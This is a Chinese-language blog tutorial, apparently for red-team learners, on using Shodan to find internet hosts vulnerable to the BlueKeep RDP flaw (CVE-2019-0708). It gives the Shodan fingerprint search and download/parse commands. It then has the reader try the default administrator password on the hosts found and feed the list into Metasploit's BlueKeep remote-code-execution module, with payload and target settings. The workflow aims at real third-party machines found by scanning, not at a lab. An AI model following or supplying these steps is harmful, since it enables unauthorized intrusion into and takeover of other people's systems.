首页 > 其他分享 >Shodan(2)红队常用参数(详情见B站泷羽SEC)

Shodan(2)红队常用参数(详情见B站泷羽SEC)

时间:2024-10-28 18:48:38浏览次数:9  
标签:shodan Windows 红队 Shodan 漏洞 0708 SEC -- x00

免责声明:本教程作者及相关参与人员对于任何直接或间接使用本教程内容而导致的任何形式的损失或损害,包括但不限于数据丢失、系统损坏、个人隐私泄露或经济损失等,不承担任何责任。所有使用本教程内容的个人或组织应自行承担全部风险。

以CVE-2019-0708漏洞为例

漏洞原理:

存在漏洞的远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数据重新占据被释放的 MS_T120,并为结构体内的函数指针赋恰当的值,即可实现远程命令执行。

这就意味着,存在漏洞的计算机只要联网,无需任何操作,就有可能遭遇黑客远程攻击,运行恶意代码等,极具破坏性

影响版本:

Windows 7、Windows Server 2008、Windows Server 2008 R2、Windows Server 2003、Windows XP

Windows 8 和 windows10 以及之后的版本不受此漏洞影响>

类似于指纹的方式查找:

\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00 >> 十六进制漏洞特征

命令:shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'

有漏洞不代表可以利用

1.windows远程连接,看主机是否存活。远程连接出现,测试弱口令administrator(账号密码都是)

2.新建0708.txt,将扫描出来的IP地址粘贴进去,删掉端口信息,再拖到kali中

3.打开msfconsole,使用命令search 0708

4.use explort/windows/rdp/cve_2019_0708_bluekeep_rce(explort/windows/rdp/cve_2019_0708_bluekeep_rce是一个利用脚本,可以在上一步的操作里面找到)

5.show options

6.set rhosts file:+目标的文件路径(将0708.txt文件拖入命令后面即可)

7.check

附:

1.测完之后可以执行show options命令

2.payload的ip端口一定要填对

3.show targets 支持windows7,sever这种,得把targets设置正确

接下来是shodan另外两个参数

parse和download(解压和下载)

shodan download -h 查看帮助文档

shodan download 0708(文件名) --limit 10 '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00 "'(删除过滤信息)

shodan parse -h 查看帮助文档

shodan parse --fields ip_str 0708>0708.txt 解压缩

shodan search vuln:cve2019-0708用不了,用前面的方法

Vuln 需要更高级别用户才能用,可以使用上面的方法进行绕过

标签:shodan,Windows,红队,Shodan,漏洞,0708,SEC,--,x00
From: https://blog.csdn.net/weixin_43433141/article/details/143309874

相关文章

  • Shodan(1)(详见B站泷羽SEC)
    免责声明:本教程作者及相关参与人员对于任何直接或间接使用本教程内容而导致的任何形式的损失或损害,包括但不限于数据丢失、系统损坏、个人隐私泄露或经济损失等,不承担任何责任。所有使用本教程内容的个人或组织应自行承担全部风险。shodan是一个搜索引擎,不同于百度、Google......
  • 【Java】若以框架(ruoyi-master)——10.BaseController源码了解
    BaseController通用方法Web层的通用数据。所有接口继承此方法。里面有一些各个接口会用到的通用方法。比如分页、返回消息、设置或获取一些登录信息,某些操作的时候,将日志写入或返回。方法归类方法名称说明请求参数预处理initBinder()将前台传递过来的日期格式的字符......
  • Qlik Sense : security rules how to work
    HowsecurityrulesworkIn QlikSenseEnterpriseonWindows youcanusesecurityrulestograntusersaccesstoresourcessuchasappsandstreams.Allsecurityrulesareinclusivebynature,thatis,youalwaysgrantusersaccesstoaresource,youneve......
  • Shodan 进阶使用技巧:无高级会员如何搜索指定漏洞并进行批量验证
    内容预览≧∀≦ゞShodan进阶使用之批量查找并验证漏洞声明导语一、漏洞信息收集二、构建Shodan搜索语句1.指定端口2.指定操作系统3.指定漏洞条件4.完整Shodan查询语句三、验证目标设备的漏洞状态示例验证命令四、使用Shodan批量下载与解析漏洞数据下载搜索......
  • 红队知识学习入门(3)Shodan使用
    声明学习视频来自B站UP主泷羽sec,如涉及侵泷羽sec权马上删除文章笔记的只是方便各位师傅学习知识,以下网站涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负一、shodansearch和host语法1、host2、searchshodansearch--limit10--fieldsip_str,port......
  • Shodan搜索引擎(2)
    目录一、Shodan的批量下载及解析1.批量下载2.解析二、Shodan的蜜罐识别三、Shodan的history使用四、VNC空密码连接4.1VNC的介绍4.2VNC的组成4.3VNC的安全性及利用vnc空密码4.3.1vncserver如何免密码4.3.2Shodan上操作命令【注意事项】声明本笔记内容参考了泷......
  • #渗透测试#SRC漏洞挖掘# 信息收集-Shodan进阶VNC
    免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章阅读。                            ......
  • 夜王 - section4 - 父爱如离
    立子的父亲虽然没有阿超父亲那样的领导能力、号召力,但是这几年也为家庭付出了很多,虽然从前只是在家里务农,赚不了多少钱,但是家里住的房屋、乃至院子里最近刚沏好的乒乓球台,都是立子他爸亲身参与建造的。直到后来因为立子上学需要的开销大,有的大高中的城里人的小孩动不动就是一身......
  • 红队老子养成记3 - 学会反弹shell的多种姿势,拿shell拿手软!!(全网最多姿势!)
    大家好,我是Dest1ny!今天还是讲redteam里比较重要的反弹shell!不会反弹shell,那你如何拿控制权限!今天满满干货,大家加油学!CLASS-1正向连接与反向连接详解1.正向连接正向连接是最常见的连接方式。当我们攻击了一台机器后,打开了该机器的一个端口,攻击者在自己的机器上主动连......
  • 2024CS 525 All SectionsProgramming
    AdvancedDatabaseOrganization-Fall2024CS525-AllSectionsProgrammingAssignmentIII:RecordManagerDue:Friday,October18th2024by23h59TaskThegoalofthisassignmentistoimplementasimplerecordmanager.Therecordmanagerhandlestablesw......